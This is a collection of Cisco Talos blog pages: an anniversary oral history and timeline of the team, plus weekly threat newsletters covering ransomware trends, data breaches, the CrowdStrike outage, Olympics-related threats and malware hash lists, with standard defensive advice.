**Luci:** Between April and August 2014, the team leaders all threw different ideas into the ring about what we would be called and what sort of brand could represent who we were becoming.  

**Watchinski:** If I remember it right, it was Matt Olney who came up with Talos, protector of the shores. That one resonated most with everyone, because it aligned with our main mission of protecting our customers.  

**Matt Olney** It came about because we wanted something big to represent us. We were now part of a team that was focussed on much more than vulnerabilities. We wanted to have a larger voice as an organization, and a larger role in security consciousness. 

**Luci:** Talos was officially launched at BlackHat in 2014. 

**The team grows**

**Liz Cooperrider, Leader, Talos Project Management Office:** When I started reporting directly to Matt \[Watchinski\] he elevated the Project Management Office (PMO) and the value of what we brought to the organization. 

Since 2019, we’ve been able to grow and become an integral part of Talos, mainly because I was given a lot of independence and autonomy from the team.

**Lee:** After Talos was formed, I was working across the Cisco portfolio, helping them to design products from a security perspective. In 2018, I came back home to Talos. My role was to work with Luci to transition the architectural aspect of Talos, and get it to a trusted product partner level, global in scope and scale, beyond the core competency of the security mission. 

We created a service delivery architecture called “Tomorrowland”. This was a big turning point. It didn’t change our security capabilities themselves, but our ability to project our power went up. 

**Lee:** At a lot of other places, rank and hierarchy matter. Titles matter, and there can be a top-down approach sometimes. But at Talos, there’s a culture of asking questions and pushing back to see, “Do I really believe this and want to incorporate this to my mission?” That is very energizing. I sat back and thought, “This is where I want to be. I’m happy. This is what I was hoping for.” 

**Amy Henderson, Director of Talos Strategic Communications and Operations:** I was a portfolio manager in the Customer Experience organization in Cisco, and at that time (October 2019), one of our key services was Incident response. The IR team worked very closely with Talos, sharing intelligence, understanding what's going on at a customer site when things go down, etc. We eventually came to the decision that Incident Response should become Talos Incident Response, bringing those teams under one umbrella. 

I got to know Watchinski and Olney and really enjoyed working with them. But there was a moment during the transition that the Talos team pulled back. They said they wanted to pause things because it wasn’t being done in the right way. Not being part of Talos at that point, I really appreciated their honesty and integrity. Because when you’re working towards delivering on a priority, sometimes you end up just pushing the ball down the road without necessarily getting the outcome that you want. It’s important to take stock and think about, “Is this actually what we want to achieve?” 

I pinged Olney and said how much I respected their decision. Because it showed the character of the Talos team. They’re not going to rubber stamp everything and say it’s OK when it’s not. 

**Brad Garnett, Director of Talos Incident Response:** I was another Talos transplant. I was running the Incident Response team on the CX side, and as Amy mentioned it made sense to bring us into Talos. Response and intelligence are like peanut butter and jelly, it just goes together.  

We gathered in London in the fall of 2019, and we talked about what IR might look like inside of Talos. Our brand, reputation, integration, intelligence services etc. I still have that agenda from nearly five years ago, and I still remember our first three customers.

That helps me bring perspective — no matter how challenging things get, we’ve hugely grown in scale. Customers need us more than ever. And our mission has grown to not just helping customers on an individual level, but to use that experience to protect all our customers. “The power of the debrief”, as I frequently say to my team. Take what we’re seeing and go help more people. 

**The mission**

**Olney**: When people ask me what I do, I tell them, “I build the expertise that allows me and my team to go places and fix things.” I’m most proud of the work that we do that makes no sense from a corporate or financial perspective, such as the election security work, the work we’ve done to protect Ukraine’s critical infrastructure…the stuff that doesn’t turn a dollar but makes the world a better place. To do all that within a capitalistic entity is pretty remarkable. 

That’s what makes me so proud of this team. We approach security problems as, “How can I positively affect the most amount of people?”  

**Luci:** Whenever I see Talos in the news, I feel really proud to be a part of an organization that isn’t out there just for the money. We’re out there to make the world a better place. 

**Watchinski:** The work we did to help Ukraine, to fill 747s with Cisco kit and fly into a country at war….being able to actually support their operations from either afar or in country, help protect their people, help them turn back on civil infrastructure so that trains run, telephones work, payment processing is functional, the basic needs of society are still met, even though adversaries are actively trying to bring those things offline… I don't think there's a ton of companies that can say they have the capability to do those things. Or even the will to do them. 

**Amy:** And then on top of that, you have Joe Marshall’s Project PowerUp work which helped keep the electrical grid in Ukraine running after disruption from GPS jamming. Joe, on his own terms, found the right people, pulled volunteers together, and we were able to build something to help the grid maintain better time so Ukrainians can have more stable electrical power. 

Extract from a Dutch newspaper reporting on Talos' work on Project PowerUp

 **Marshall:** When we can pull off that kind of thing, it’s because of the trust that we have. More people today trust us than ever before. And I think that trust is well-deserved because of the solid information we can provide.

We bring verified information our customers can act upon, as well as bringing calm to a situation so we can encourage reason. We keep doing that no matter what else happens, and that gives people peace of mind. 

**Amy:** What’s common amongst the folks that we hire is they know that sometimes they’ll need to drop everything and pivot to a rapid response effort. I hope they know that our leadership team fights to give them air cover to a) keep them sane during those times, and b) makes sure that they have what they need. As a leadership team we fight for budgets and time and resources that can help them, because our people have such an innate sense of doing the right thing. We know that the lengths that people go to, and that's one of the many reasons why we will protect them every single day. 

** Our culture**

**Lurene:** In the early days of Sourcefire, there was no situation that came up where we couldn't sit down together and come up with a plan to solve it. We would make it work, and in so doing, we would make a change in the industry. We were given the space to do that. Matt \[Watchinski\] would say, “Go figure this out, come up with some plans, give me three options, and then we're gonna pick one of them and do it.” 

When I came back to Talos two years ago, I was so pleased to see that everybody had protected that culture and passed it on to new leaders in the group. I’m really proud of that. 

It’s our job to make people feel comfortable who might not feel comfortable elsewhere. Developing a space for people who are extremely valuable team members but might have trouble thriving in an extremely generic environment. I am one of those people, so I know I can say that. 

**Olney:** We want Talos be a thing that's worth being yourself with. Our culture is very conscious.  We didn’t do a survey and figure out, “Employees are 2.5% more engaged if you give them free drinks.” They get to define who they are, and who they want to be at Talos. And they get to define what you want your experience at Talos to be like. 

**Liz:** In other organizations, if a team doesn't make their deliverable, there’s zero compassion and no understanding – “Why did that fail?” Within Talos, we can fail and fail fast because there is so much clear transparency. That’s completely a part of the culture. 

**Marshall:** It really is. Until I myself attain perfection, it’s unfair for me to expect perfection from anyone else. 

**Olney:** We ask so much of our people.  We ask them to move fast and make tough decisions. If we were set the tone that every time someone screwed up, it was a job threatening situation, then people would be far more hesitant. They would work inside of smaller boxes. They would think smaller, and they would act less boldly. They would fade into the background more often. That’s the exact opposite of what we want.  

There’s no “Key performance metric” for Joe Marshall to build relationships with the Ukrainians and then come up with a solution that helps them keep the lights on. It’s just what we do…it’s just what we, as Talos, do. 

**Watchinski:** Our culture is the thing I’m most proud of, of all the things Talos has achieved over the past 10 years. 

**Liz:** Talos is also very family first. I remember once I was caring for my father. He had had a hip replacement, and I was to take care of him when he came home from the hospital. I thought I could do it by myself – be his 24-hour nurse and do my job at the same time. I showed up to a sync with Chinski, and he immediately knew something was wrong. He wasn't interested in any of the business side of things. He simply said, “Go. Go take care of your father.”  

**Marshall:** I stand by the idea that if I take care of my people, my people take care of me. That’s something I ask of all my managers — just take care of your people. The No. 2 thing I ask is to meet the needs of the business. 

**Watchinski:** A lot of people in this organization have been with me for 5,10,15 even 20 years. They’ve gone from junior analyst to senior director inside a Fortune 500 company. And even when you look at all the folks that have left the organization over the years, they've all gone on to do great things. 

**Marshall:** No matter what, I want people to be better for their time spent with us. And if they exit tomorrow but they’ve accomplished that, then we’ve done our job. 

**Brad:** People who have moved on from Talos have said to me, “The Talos years are some of the best years of my career.” To me, that’s worth protecting. 

For more Talos 10 celebrations, take a look at some our key moments:

"There is no business school class that would ever sit down and design Talos"

Seeing a “blue screen of death,” often with code that looks indecipherable, has been ingrained into our heads that it’s a “hack."

Thursday, July 25, 2024 14:00

You’re not going to believe this, but there was a lot of misinformation on social media over the weekend after the massive CrowdStrike/Microsoft outage.  

As airlines cancelled flights, hospitals had to reschedule patients and some companies just flat-out couldn’t work on Friday, people were quick to assume that the outage, which was actually caused by a faulty CrowdStrike Falcon update, was a cyber attack. 

Media headlines posed the question: “Cyber attack, or outage?” Social posters quickly assumed this was some sort of “hack.”  

On the one hand, I get it. Seeing a “blue screen of death,” often with code that looks indecipherable, has been ingrained into our heads that it’s a “hack,” because that’s how they’ve always been displayed in works of fiction or as the generic image of a “hack” anytime there is actually a real cyber attack.  

That’s not to say there aren’t many lessons to be learned from this outage, and at some point, we’ll be ready to dig into those. But also calling this a cyber attack can spread unnecessary FUD, especially when threat actors are trying to capitalize on the outage to spread malware in _actual_ cyber attacks.  

**The one big thing **

Business email compromise (BEC) and ransomware were the top threats observed by Cisco Talos Incident Response (Talos IR) in the second quarter of 2024, accounting for 60 percent of engagements. Although there was a decrease in BEC engagements from last quarter, it was still a major threat for the second quarter in a row. There was a slight increase in ransomware where Talos IR responded to Mallox and Underground Team ransomware for the first time this quarter, as well as the previously seen Black Basta and BlackSuit ransomware operations.   

**Why do I care? **

Within BEC attacks, adversaries will compromise legitimate business email accounts and use them to send phishing emails to obtain sensitive information, such as account credentials. Adversaries can also use compromised accounts to send emails with fraudulent financial requests, such as changing bank account information related to payroll or vendor invoices. Targeting employees’ personal mobile devices can be an effective method for initial access because they may not have the same security controls as their corporate devices. Organizations should ensure SMS phishing scams are included in security awareness training for employees.    

**So now what? **

The lack of MFA remains one of the biggest impediments for enterprise security. All organizations should implement some form of MFA, such as Cisco Duo. The implementation of MFA and a single sign-on system can ensure only trusted parties are accessing corporate email accounts to prevent the spread of BEC. 

**Top security headlines of the week **

**A false narrative spread over the weekend that Southwest Airlines was using a very old version of Windows, which allowed it to escape the CrowdStrike-related outage.** Many news outlets reported that Southwest’s system relies on Windows 3.1, released more than 20 years ago. However, this does not actually appear to be the case, though Southwest’s systems may still be outdated compared to its competitors. Instead, Southwest may have been largely unaffected by the outage simply because it doesn’t use CrowdStrike. Delta, American, Spirit, Frontier, United and Allegiant airlines all reported that they were affected by the outage, forcing the cancellation of thousands of flights across the globe. The source of the story that Southwest uses Windows 3.1 appears to come from posts on social media, the original one of which provided no sources, links or background information to back this statement up. Another popular piece of fake news that made the rounds during the widespread outage was that the Las Vegas Sphere was a victim of the outage, with a fake image spreading online appearing to show the “blue screen of death” on the outside of the concert and event venue. (Kotaku, OSNews) 

**U.K. police arrested a teenager suspected of being a member of the Scattered Spider hacking group and a perpetrator of the massive MGM ransomware attack last year.** The arrest is part of a larger investigation conducted by the National Crime Agency in the U.K. and the U.S.’s FBI into a hacking group that is known to breach networks, steal data and deploy ransomware. While not named explicitly in the arrest announcement, this group is largely known as Scattered Spider. The group breached MGM’s network last year, taking hotel and casino services offline for several days, even just forcing some casino operations to stop altogether. MGM eventually paid a multi-million dollar ransomware to the attackers. Scattered Spider is a group of English-speaking threat actors, some of whom are as young as 16, and commonly communicate via Telegram channels and Discord servers. An English detective involved in the operation stated that the 17-year-old in question was part of a group that “targeted well-known organizations with ransomware, and they have successfully targeted multiple victims around the world, taking from them significant amounts of money.” (Bleeping Computer, Dark Reading) 

**Russian state-sponsored actors or hacktivist groups are likely to try and disrupt the upcoming Olympic games in France via cyber attacks, misinformation campaigns and deepfake photos and videos.** Russia has been excluded from the Summer Olympics because of its involvement in an alleged doping scheme with its athletes and has been increasingly hostile toward the West for its support of Ukraine. Russian threat actors have already been spreading disinformation, with Microsoft warning that some actors have been deploying influencers deploying artificial intelligence to “denigrate the reputation of the \[International Olympic Committee\]” and “creating the expectation of violence” at the Olympics. French authorities have also already arrested a Russian national who the government alleges was planning various events to “destabilize” the games. Researchers from FortiGuard Labs have also reported that there has been a spike of dark web activity among known Russian adversaries, including Cyber Army Russia Reborn and LulzSec, specifically saying they plan to target the Olympics. Russia may also seek to use its influence on hacktivist groups to do its bidding so that the Russian government has plausible deniability in any activities. (Forbes, Financial Times) 

**Can't get enough Talos?**

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

The massive computer outage over the weekend was not a cyber attack, and I’m not sure why we have to keep saying that

Although there was a decrease in BEC engagements from last quarter, it was still a major threat for the second quarter in a row.

IR Trends: Ransomware on the rise, while technology becomes most targeted sector

Relive some of the major cybersecurity incidents and events that have shaped Talos over the past 10 years.

Wednesday, July 24, 2024 06:00

A lot has happened in Talos’ 10 years of existence. And to celebrate our birthday, we wanted to look back on some of the major moments in Talos’ history. Here’s an overview of some of the major events, cyber attacks, research breakthroughs and more that truly make Talos _Talos_. We hope this walk down memory lane inspires good times reminiscing, provides lessons learned from cyber attacks past, or PTSD from those late nights — whether you worked at Talos or not.

*   **2001:** Martin Roesch, the creator of Snort, founds Sourcefire.
*   **July 2013:** Cisco Systems announces an agreement to buy Sourcefire for $2.7 billion.
*   **April 2014:** Stakeholders from Sourcefire, Cisco Threat Research, Analysis and Communications (TRAC), and Security Applications (SecApps) start meeting to discuss the formation of Talos — including what the name would be!
*   **August 2014:** Talos is formally launched at the BlackHat cybersecurity conference.
*   **March 2015:** Talos publishes breaking research on the POSeidon point-of-sale malware, one of the first major coordinated cyber attacks found under the Talos banner.
*   **Oct. 2015:** Talos helped to shut down the Angler exploit kit by shutting down access for customers by updating Cisco products to stop redirects to the Angler proxy servers, and releasing new Snort rules to detect and block checks from the exploit kit. At the time, we estimated that Angler was targeting more than 90,000 users a day and generating $30 million annually.     
*   **May 2017:** WannaCry, which to this day is one of the largest ransomware attacks ever, hits several notable victims, including FedEx and the National Health Service in the U.K. Attackers exploited the NSA-created EternalBlue exploit.

*   **May 2017:** The first-ever episode of Beers with Talos goes live.
*   **June 2017:** EternalBlue pops up again, this time with the Nyetya ransomware attack. The attackers primarily deployed the malware via a fake update to the Ukrainian-made MeDoc tax software.
*   **June 2017:** A team of Talosians comes first in the Fake News Challenge after creating a tool that uses advanced machine learning and artificial intelligence technology to detect fake headlines and misleading “facts.”
*   **Feb. 2018:** Talos’ discovered samples of malware used to disrupt various technologies at the Olympic Games in Japan, including ticket-taking operations during the Opening Ceremony. OlympicDestroyer would have ripple effects for months as we tried to figure out who exactly was (or wasn’t) behind the attack.
*   **May 2018:** Talos publishes our findings on VPNFilter, a massive malware campaign from Russian state-sponsored actors. At the time of publishing, we estimated that VPNFilter affected more than 500,000 internet-connected devices.

*   **Nov. 2018:** DNSpionage, a previously undiscovered malware, makes headlines for targeting a Lebanese airline and companies in the United Arab Emirates. Adversaries set up fake job application phishing pages hoping to infect targets with malicious Microsoft Word applications.
*   **Feb. 2019:** Talos releases our 3-D printed model of an oil pumpjack into the wild to demonstrate how an attacker could overload it if it exploits the human-machine interface the pump relies on.

*   **Oct. 2019:** Cisco Talos Incident Response is officially launched. Merging Incident Response from Cisco’s CX organization with Talos’ threat intelligence, Talos IR offers proactive and reactive assistance to customers around the world.
*   **May 2020:** Talos’ Vulnerability Research team takes part in the Microsoft Azure Sphere Research Challenge, eventually discovering 16 security vulnerabilities in the popular application platform. Talos was one of only a handful of teams selected for the challenge. Specifically, a vulnerability the team discovered made headlines for potentially allowing an adversary to acquire Azure Sphere Capabilities, the most valuable Linux normal-world permissions in the Azure Sphere context.
*   **Nov. 2020:** The infamous “pig couch” goes viral after a fake Craigslist ad for it spreads on social media. This somehow ended up with the Snort Twitter account also going viral, and Marty Roesch making it into The New York Times.

Via Craigslist

*   **Dec. 2020:** Capping off a string of major supply chain attacks, adversaries compromise the legitimate SolarWinds Orion IT management software to deploy malware via a fake software update.
*   **Jan. 2021:** Snort 3, the first major release for Snort in more than a decade, goes open-source.
*   **Dec. 2021:** Just days before the winter holidays, the internet nearly catches on fire with the infamous Log4shell vulnerability in Log4j.

*   **Feb. 2022:** The Russian military launches an offensive assault against Ukraine. Talos immediately responds to assist Ukraine, capitalizing on yearslong partnerships to help keep critical infrastructure online and users protected from a barrage of cyber attacks. We would also assist Talos teammates in staying protected, supporting them in moving to other countries.
*   **May 2022:** ClamAV, Sourcefire’s original anti-virus detection solution, turns 20 (and will finally go 1.0 a few months later!)
*   **April 2023:** Cisco and Talos help to launch the Network Resilience Coalition, a group of technology companies working to ensure users and companies upgrade and update their network infrastructure. The effort was launched after the discovery of JaguarTooth, a massive campaign targeting unpatched wireless routers.
*   **May 2023:** Talos enters the world of private sector offensive actors (PSOAs) by disclosing new technical details about the Predator spyware and its creator, Intellexa. Spyware from these so-called “mercenary groups” is still spreading, often being used to target potentially sensitive users like journalists, activists and politicians.
*   **December 2023:** Talos discloses the details of Project PowerUp, a cross-team effort to help protect Ukraine’s power grid and the GPS positioning it relies on. Spearheaded by Joe Marshall, the multi-national, multi-company global team of power grid security practitioners, who had never worked together before, built a device to help Ukraine keep the lights on.

*   **March 2024:** Talos releases SnortML, a machine learning-based detection engine for the Snort Intrusion prevention system.
*   **August 2024:** Talos celebrates its 10th anniversary — cheers to many more!

A (somewhat) complete timeline of Talos’ history

Telecommunications provider AT&T disclosed earlier this month that adversaries stole a cache of data that contained the phone numbers and call records of “nearly all” of its customers.

Thursday, July 18, 2024 14:00

Between AT&T, all the follow-on activity from Snowflake, Microsoft Outlook, and more, it’s best to probably just assume at this point that your personal information has somehow been involved in a data breach. 

We’re only halfway through 2024, and we’ve already seen some of the largest data breaches and leaks in history. Telecommunications provider AT&T disclosed earlier this month that adversaries stole a cache of data that contained the phone numbers and call records of “nearly all” of its customers, which equates to about 110 million people.  

Even if you’ve yet to receive the dreaded boilerplate notification email from any company, it’s probably just best for all of us to assume that some of our personal information has been accessed, leaked or stolen over the past few years, or it’s going to be eventually.  

I took this as an opportunity to check for myself. The ever-popular Have I Been Pwned? says my personal email address has been involved in 14 breaches, some dating back to 2017 and one as recently as June.  

Thankfully, Trend Micro’s ID Protect says that my personal cell phone hasn’t been involved in any data breaches, but that certainly hasn’t stopped me from getting my fair share of spam texts and phone calls. 

Outside of those two search engines, I felt like this would be a good space to provide additional resources and advice for anyone reading this. Even if you haven’t been a part of the recent spate of data breaches, I think it’s a good idea to take these steps now anyway, because you never know when the next breach is going to happen.  

*   **Stop reusing passwords.** Use a free password manager to generate random, secure passwords for each new account you create. That way, if one of your passwords \*is\* leaked, it makes it impossible for adversaries to start using those leaked credentials to try and brute force their way into other accounts.  
*   Once you enroll in that password manager, use it to frequently update and rotate your passwords.  
*   **Enroll in multi-factor authentication.** Using any type of MFA will ensure bad actors aren’t using any leaked credentials to log into other devices, so even if they have a complete set of usernames and passwords, you can still deny their login.  
*   **Initiate a fraud alert** **to credit reporting agencies.** Of course, this only applies to users who live in the U.S. (though I’m sure other countries have something similar; I can only confidently write about the process in the U.S.). This will let potential lenders know that you may be the victim of fraudulent activity so they will take extra steps to ensure it’s actually you filling out a credit application.  
*   **If a company responsible for exposing your information offers you free credit monitoring, take advantage of it.** We’ll be covering what identity monitoring does for users in tomorrow morning’s episode of Talos Takes, so stay tuned! 
*   **Set up a unique passcode needed to make changes to certain accounts.** AT&T is specifically advising customers to set up a passcode needed to prevent any significant account changes, such as porting phone numbers to another carrier.  

**The one big thing **

Speaking of data breaches, adversaries know that users and companies are concerned about this threat, too, and they’re leveraging that in phishing attacks and scams. Talos researchers recently observed an ongoing cryptocurrency heist scam since as early as January 2024, leveraging hybrid social engineering techniques such as vishing and spear phishing, impersonating individuals and legitimate authorities to compromise the victims by psychologically manipulating their trust with social skills. Impersonating investigation officers of CySEC (Cyprus Securities and Exchange Commission), the scammers in this campaign are using a lure theme of refunding a fake seized amount from a fraudulent trading activity in Opteck trading platform to compromise the victims. 

**Why do I care? **

This particular campaign seems to be successful, as wallets connected to the group have received tens of thousands of U.S. dollars in the Ethereum cryptocurrency. But this is also evidence of a broader trend on the threat landscape: Attackers are going to be using data breaches as a threat and lure going forward. Users who are afraid of their data being leaked may be more likely to click on a phishing email or lure document that claims to have information on a leak. Or they may be more open to clicking on a link claiming to lead to “free” identity monitoring.  

**So now what? **

The significance of data breaches is facilitating the adversaries in their scam campaigns providing them the information needed to execute fraudulent activities, causing extensive financial, reputational, and psychological damage to individuals and organizations. So, creating security awareness in public is a preliminary responsibility of the organizations and security community. It empowers individuals to protect themselves and supports organizational security efforts. By fostering a culture of security awareness, the risks associated with data breaches and scam campaigns can be reduced. 

**Top security headlines of the week **

**Trend Micro’s Zero Day Initiative publicly called out Microsoft for not crediting their researchers for a recently disclosed vulnerability.** Security researchers at ZDI say they first informed Microsoft of the vulnerability in May and hadn’t heard anything about it again until it showed up in July’s Patch Tuesday, Microsoft’s monthly security update. The ZDI blog post has generated additional conversations in the security community about the pros and cons of coordinated vulnerability disclosure and existing problems with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) CVD program. There is also still uncertainty on the exact nature of the vulnerability, CVE-2024-38112. The initial discoverers say it is a remote code execution vulnerability that should be considered critical, though when Microsoft disclosed it, it came with a lower CVSS score and identified it as a spoofing vulnerability. “CVD doesn’t work if the only ones coordinating are the researchers. While these are Microsoft examples, there are multiple occasions from various vendors where ‘coordination’ simply means ‘You tell us everything you know about this bug, and maybe something will happen,’” Trend Micro wrote in their blog post. (Zero Day Initiative, The Register) 

**A data breach unmasked the company behind the spyware mSpy and a list of its customers.** According to the data leak site Have I Been Pwned?, unknown attackers stole millions of customer support tickets, eventually leaking 142GB of data. The leaked information includes personal details of customers, emails to mSpy’s support team and email attachments. mSpy promotes itself as a phone surveillance app that can track users’ children or employees. However, it is often used to monitor people without their consent, like most spyware. The stolen data includes customer and user emails to mSpy support via the third-party software Zendesk. Leaked emails include targets who did not wish to have the spyware tracking their device, including journalists, and even U.S. law enforcement agents looking to file subpoenas or legal demands with the company. Once installed on an infected device, mSpy can monitor keystrokes, review text messages, track users’ locations, scrape their social media accounts and view the target’s sent and received photos. (TechCrunch, PC World) 

**The Iranian APT MuddyWater added a new backdoor to its malware arsenal known as BugSleep.** Security researchers say the malware “partially replaces” the actor’s traditional use of legitimate remote monitoring tools. MuddyWater is known for its connections to Iran’s Ministry of Intelligence and Security (MOIS). The group’s most recent campaign included sending phishing emails that invite targets to attend online classes and webinars to 10 different Israeli companies. Some versions of BugSleep come with a custom malware loader that injects the backdoor into the active processes of several well-known software, including Microsoft Edge, Google Chrome and Microsoft OneDrive, so taht it can remain undetected. Talos has reported on several MuddyWater campaigns over the past few years against entities spread throughout the U.S.A, Europe, Middle East and South Asia. Their campaigns are primarily designed to either steal sensitive information or execute ransomware on a targeted network. (The Register, Bleeping Computer) 

**Can’t get enough Talos? **

*   Cisco Talos Report Reveals Critical Insights in Ransomware Trends 
*   Cisco Talos analyzes attack chains, network ransomware tactics 
*   Cisco Talos: Top Ransomware TTPs Exposed 
*   Talos Takes Ep. #190: What we learned from studying the TTPs of the 14 most active ransomware groups 

**Upcoming events where you can find Talos **

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201

It's best to just assume you’ve been involved in a data breach somehow

Even if a threat actor isn’t successful in some widespread breach that makes international headlines, even smaller-scale threats and actors are just hoping to cause chaos.

Thursday, July 11, 2024 14:00

With the 2024 Olympics’ Opening Ceremony only two weeks away now, there is one thing that’s an absolute guarantee of one thing happening during the traditionally unpredictable games: Cyber attacks. 

Every time there is a new Olympic Games, there’s a renewed discussion about how threat actors, hacktivists and state-sponsored groups are all gearing up to try to disrupt the games in some way. The Opening Ceremony at the 2018 Olympic Games in South Korea was disrupted by a major cyber attack called Olympic Destroyer, briefly pausing ticket-taking operations and taking down several Olympics-related websites. 

And for this year’s Summer Games, France faces an “unprecedented level of threat,” according to the head of the country’s cybersecurity agency.  

That’s because, in our modern day, there is just simply so much to protect. Ninety-nine percent of modern communication occurs over a network at this point, especially when you’re talking about an international event. That means protecting individual inboxes, mail servers, third-party messaging apps, virtual meetings and more. 

Each attendee of the games is going to bring in their own devices, too, and connect to whatever public network the Olympics stands up at the arenas or fields where competitions are taking place. That’s tens of thousands of new potential entry points for threat actors. 

There are also domains, subdomains, hosts, web applications and third-party cloud resources that the Games rely on, all with their own attack surfaces. 

A study from Outpost24 earlier this year found that the security for all these factors is stronger than when Russia hosted the 2018 FIFA World Cup, which came with a similar set of circumstances and popularity to the Olympics.  

Even if a threat actor isn’t successful in some widespread breach that makes international headlines, even smaller-scale threats and actors are just hoping to cause chaos.  

Last month, a fake AI-generated movie trailer seemed to show famous actor Tom Cruise condemning the International Olympic Committee in a fake documentary for Netflix. That made its rounds on Telegram, along with many threats around terrorist attacks in the hope of scaring attendees away and making the Games seem under-attended. 

Other actors are just looking to spread general misinformation, capitalizing on recent protests and elections in France to, in their mind, sow chaos in an already chaotic time for the country. 

France has been preparing for the bevy of threats with hundreds of penetration tests, tabletop exercises and, of course, partnering with Cisco to protect the Olympic Games.  

**The one big thing **

Based on a comprehensive review of more than a dozen prominent ransomware groups, Talos identified several commonalities in tactics, techniques and procedures (TTPs), along with several notable differences and outliers. Talos’ studies indicate that the most prolific ransomware actors prioritize gaining initial access to targeted networks, with valid accounts being the most common mechanism. Phishing for credentials often precedes these attacks, a trend observed across all incident response engagements, consistent with our 2023 Year in Review report. Over the past year, many groups have increasingly exploited known and zero-day vulnerabilities in public-facing applications, making this a prevalent initial access vector. 

**Why do I care? **

Key findings indicate that many of the most prominent groups in the ransomware space prioritize establishing initial access and evading defenses in their attack chains, highlighting these phases as strategic focal points. Within the past year, many groups have exploited critical vulnerabilities in public-facing applications, becoming a prevalent attack vector, which we addressed later, indicating an increased need for appropriate security controls and patch management. Ransomware actors also continue to apply a significant focus to defense evasion tactics to increase dwell time in victim networks. 

**So now what? **

Our blog post includes several recommendations for how potential targets can protect against the TTPs these groups use. That includes consistently applying patches and updates to all systems and software to address vulnerabilities promptly and reduce the risk of exploitation and implement strong password policies that require complex, unique passwords for each account. Additionally, enforce multi-factor authentication (MFA) to add an extra layer of security. 

**Top security headlines of the week **

**Apple IDs are being targeted in a new SMS-based phishing scam.** Security researchers say that adversaries are sending text messages to iPhone users in the U.S. disguised to look like they’re from Apple but actually intended to steal their Apple login credentials. The phishing messages are made to seem more legitimate with a fake CAPTCHA for users to complete. They are then directed to a malicious web page that looks like an older iCloud login page, where the targeted user is asked to enter their Apple ID. Apple IDs are valuable for attackers because they could allow them to log into the target’s iPhones and iPads, provide access to personal information, and allow the attacker to make unauthorized purchases. Apple warned users that they should be implementing MFA on their devices to ensure an adversary can’t use their credentials on an unknown device, or using Face ID or Touch ID to log into their devices. iPhone users are unlikely to ever receive text messages from Apple asking for their ID, but if they do, they should manually visit the desired website rather than clicking on a link in the message. (CBS News, Forbes) 

**A newly discovered spyware may have been spying on military members across the Middle East for more than five years.** The tool, called GuardZoo, appears to be created by Houthi-aligned actors in Yemen. GuardZoo is a custom Android surveillance tool that’s used to steal potentially valuable information and military intelligence, including documents, photos and data relating to troop locations. Infection of GuardZoo begins with a malicious link sent in a WhatsApp message. These phishing links lead to one of a variety of fake apps outside of the Google Play store, disguising themselves as a range of services including an app for reading the Quran, device location tracking, and other themes relating to the Yemen Armed Forces and Saudi Arabia’s Armed Forces Command and Staff College. GuardZoo managed to fly under the radar for several years because it was a modified version of the previously known Dendroid remote access trojan. Once on a device, GuardZoo immediately disables local logging and exfiltrates all of the victim’s files from the past seven years that are KMZ, WPT, RTE or TRK files, all of which relate to GPS and mapping apps. (Dark Reading, SC Media) 

